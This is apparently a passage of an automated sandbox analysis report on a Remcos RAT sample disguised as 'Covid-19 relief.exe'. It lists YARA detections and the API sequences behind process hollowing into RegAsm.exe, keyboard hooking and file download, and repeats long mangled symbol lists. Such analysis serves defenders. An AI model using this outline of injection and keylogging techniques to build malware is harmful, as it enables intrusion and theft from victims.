            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040D2A6 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,SetEvent,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,GetTickCount,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,Sleep,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,URLDownloadToFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,OpenClipboard,Sleep,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,?c_str@?$basic_string@GU?$char_trait2_2_0040D2A6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040D2A6 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,SetEvent,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,GetTickCount,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,Sleep,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,URLDownloadToFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,OpenClipboard,Sleep,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,?c_str@?$basic_string@GU?$char_trait2_2_0040D2A6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040D2A6 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,SetEvent,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,GetTickCount,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,Sleep,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,URLDownloadToFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,OpenClipboard,Sleep,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,?c_str@?$basic_string@GU?$char_trait2_2_0040D2A6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040D2A6 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,SetEvent,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,GetTickCount,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,Sleep,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,URLDownloadToFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,OpenClipboard,Sleep,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,?c_str@?$basic_string@GU?$char_trait2_2_0040D2A6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040532D GetKeyState,GetKeyState,GetKeyState,CallNextHookEx,2_2_0040532D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040532D GetKeyState,GetKeyState,GetKeyState,CallNextHookEx,2_2_0040532D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 5_2_0040532D GetKeyState,GetKeyState,GetKeyState,CallNextHookEx,5_2_0040532D

            E-Banking Fraud:

            barindex
            Yara detected Remcos RATShow sources
            Source: Yara matchFile source: 00000001.00000002.925613507.0000000004101000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.926179641.0000000004061000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.928004137.0000000006440000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.927946901.0000000005CC0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.926940095.0000000005E10000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000001.00000002.927045842.0000000006430000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 4584, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 5568, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Covid-19 relief.exe PID: 5676, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: Covid-19 relief.exe PID: 1320, type: MEMORY
            Source: Yara matchFile source: 5.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.Covid-19 relief.exe.6440000.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 3.2.Covid-19 relief.exe.6440000.3.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.Covid-19 relief.exe.6430000.3.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 1.2.Covid-19 relief.exe.6430000.3.raw.unpack, type: UNPACKEDPE

            System Summary:

            barindex
            Malicious sample detected (through community Yara rule)Show sources
            Source: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Remcos Payload Author: kevoreilly
            Source: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
            Source: 00000003.00000002.928004137.0000000006440000.00000040.00000001.sdmp, type: MEMORYMatched rule: Remcos Payload Author: kevoreilly
            Source: 00000003.00000002.928004137.0000000006440000.00000040.00000001.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
            Source: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Remcos Payload Author: kevoreilly
            Source: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
            Source: 00000001.00000002.927045842.0000000006430000.00000040.00000001.sdmp, type: MEMORYMatched rule: Remcos Payload Author: kevoreilly
            Source: 00000001.00000002.927045842.0000000006430000.00000040.00000001.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
            Source: 5.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Remcos Payload Author: kevoreilly
            Source: 5.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
            Source: 5.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Remcos Payload Author: kevoreilly
            Source: 5.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
            Source: 3.2.Covid-19 relief.exe.6440000.3.unpack, type: UNPACKEDPEMatched rule: Remcos Payload Author: kevoreilly
            Source: 3.2.Covid-19 relief.exe.6440000.3.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
            Source: 3.2.Covid-19 relief.exe.6440000.3.raw.unpack, type: UNPACKEDPEMatched rule: Remcos Payload Author: kevoreilly
            Source: 3.2.Covid-19 relief.exe.6440000.3.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
            Source: 1.2.Covid-19 relief.exe.6430000.3.unpack, type: UNPACKEDPEMatched rule: Remcos Payload Author: kevoreilly
            Source: 1.2.Covid-19 relief.exe.6430000.3.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
            Source: 2.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Remcos Payload Author: kevoreilly
            Source: 2.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
            Source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Remcos Payload Author: kevoreilly
            Source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
            Source: 1.2.Covid-19 relief.exe.6430000.3.raw.unpack, type: UNPACKEDPEMatched rule: Remcos Payload Author: kevoreilly
            Source: 1.2.Covid-19 relief.exe.6430000.3.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
            Source: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Remcos Payload Author: kevoreilly
            Source: 00000005.00000002.676673165.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
            Source: 00000003.00000002.928004137.0000000006440000.00000040.00000001.sdmp, type: MEMORYMatched rule: Remcos Payload Author: kevoreilly
            Source: 00000003.00000002.928004137.0000000006440000.00000040.00000001.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
            Source: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Remcos Payload Author: kevoreilly
            Source: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
            Source: 00000001.00000002.927045842.0000000006430000.00000040.00000001.sdmp, type: MEMORYMatched rule: Remcos Payload Author: kevoreilly
            Source: 00000001.00000002.927045842.0000000006430000.00000040.00000001.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
            Source: 5.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Remcos Payload Author: kevoreilly
            Source: 5.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
            Source: 5.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Remcos Payload Author: kevoreilly
            Source: 5.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
            Source: 3.2.Covid-19 relief.exe.6440000.3.unpack, type: UNPACKEDPEMatched rule: Remcos Payload Author: kevoreilly
            Source: 3.2.Covid-19 relief.exe.6440000.3.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
            Source: 3.2.Covid-19 relief.exe.6440000.3.raw.unpack, type: UNPACKEDPEMatched rule: Remcos Payload Author: kevoreilly
            Source: 3.2.Covid-19 relief.exe.6440000.3.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
            Source: 1.2.Covid-19 relief.exe.6430000.3.unpack, type: UNPACKEDPEMatched rule: Remcos Payload Author: kevoreilly
            Source: 1.2.Covid-19 relief.exe.6430000.3.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
            Source: 2.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Remcos Payload Author: kevoreilly
            Source: 2.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
            Source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Remcos Payload Author: kevoreilly
            Source: 2.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
            Source: 1.2.Covid-19 relief.exe.6430000.3.raw.unpack, type: UNPACKEDPEMatched rule: Remcos Payload Author: kevoreilly
            Source: 1.2.Covid-19 relief.exe.6430000.3.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
            Source: C:\Users\user\Desktop\Covid-19 relief.exeCode function: 1_2_057B1C09 CreateProcessW,NtQueryInformationProcess,NtReadVirtualMemory,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtWriteVirtualMemory,NtGetContextThread,NtSetContextThread,NtResumeThread,1_2_057B1C09
            Source: C:\Users\user\Desktop\Covid-19 relief.exeCode function: 1_2_057B00AD NtOpenSection,NtMapViewOfSection,1_2_057B00AD
            Source: C:\Users\user\Desktop\Covid-19 relief.exeCode function: 1_2_057B1C09 CreateProcessW,NtQueryInformationProcess,NtReadVirtualMemory,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtWriteVirtualMemory,NtGetContextThread,NtSetContextThread,NtResumeThread,1_2_057B1C09
            Source: C:\Users\user\Desktop\Covid-19 relief.exeCode function: 1_2_057B00AD NtOpenSection,NtMapViewOfSection,1_2_057B00AD
            Source: C:\Users\user\Desktop\Covid-19 relief.exeCode function: 3_2_05791C09 CreateProcessW,NtQueryInformationProcess,NtReadVirtualMemory,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtTerminateProcess,NtUnmapViewOfSection,NtWriteVirtualMemory,NtGetContextThread,NtSetContextThread,NtResumeThread,3_2_05791C09
            Source: C:\Users\user\Desktop\Covid-19 relief.exeCode function: 3_2_057900AD NtOpenSection,NtMapViewOfSection,3_2_057900AD
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_0040D2A6 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,SetEvent,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB,?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z,GetTickCount,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,atoi,??8std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z,Sleep,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ,URLDownloadToFileW,??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@